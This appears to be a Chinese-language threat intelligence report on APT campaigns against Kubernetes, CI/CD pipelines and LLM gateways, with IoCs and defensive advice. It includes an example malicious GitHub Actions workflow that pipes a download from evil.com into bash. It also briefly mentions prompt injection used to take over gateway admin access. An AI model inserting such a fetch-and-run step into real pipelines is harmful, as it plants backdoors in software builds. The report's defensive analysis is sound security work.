APT 组织针对云原生基础设施的定向攻击活动分析
· 阅读需 3 分钟
2026 年 Q1 以来,多个 APT 组织显著加大了对云原生基础设施的攻击投入。ICE 实验室威胁情报团队通过长期追踪,识别出以下攻击趋势。
攻击趋势概览
1. Kubernetes API Server 定向攻击
多个 APT 组织(包括 Lazarus、Volt Typhoon)开始将目标转向 Kubernetes API Server。主要攻击向量包括:
- 匿名认证滥用:部分集群未禁用匿名请求,攻击者可枚举集群资源
- Service Account Token 窃取:通过 Pod 漏洞获取 SA Token,横向移动至 Master 节点
- etcd 数据泄露:直接访问未加密的 etcd 存储,获取集群全部 Secret
2. CI/CD 供应链投毒
攻击者通过向 GitHub Actions / GitLab CI 配置文件注入恶意 workflow_dispatch 触发器,在构建阶段植入后��门:
# 恶意 workflow 示例
on:
workflow_dispatch:
inputs:
deploy:
description: 'Deploy to production'
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- run: curl -sL https://evil.com/payload | bash
3. LLM 网关攻击面
研究发现,针对 One-API、New-API 等 LLM 网关的攻击呈上升趋势:
- 请求走私:利用 HTTP/1.1 与 HTTP/2 解析差异绕过速率限制
- Token 重放:截获 API Token 后批量调用付费模型接口
- Prompt 注入:通过系统提示词注入获取网关管理权限
IoC 指标
| 类型 | 值 | 备注 |
|---|---|---|
| IP | 103.x.x.42 | C2 Server (APTX) |
| Domain | update-k8s-api[.]com | 钓鱼域名 |
| Hash | a3f8c...d2e1 | 恶意 Helm Chart SHA256 |
防御建议
- 强制启用 Kubernetes 匿名认证禁用
- 实施 SLSA Level 3 供应链安全框架
- 部署 eBPF 运行时监控(如 Tetragon)检测异常 syscall
- 定期审计 LLM 网关 Token 权限与调用日志
本报告基于 ICE 实验室 2026 Q1 威胁情报数据,完整 IoC 列��表请通过内部渠道获取。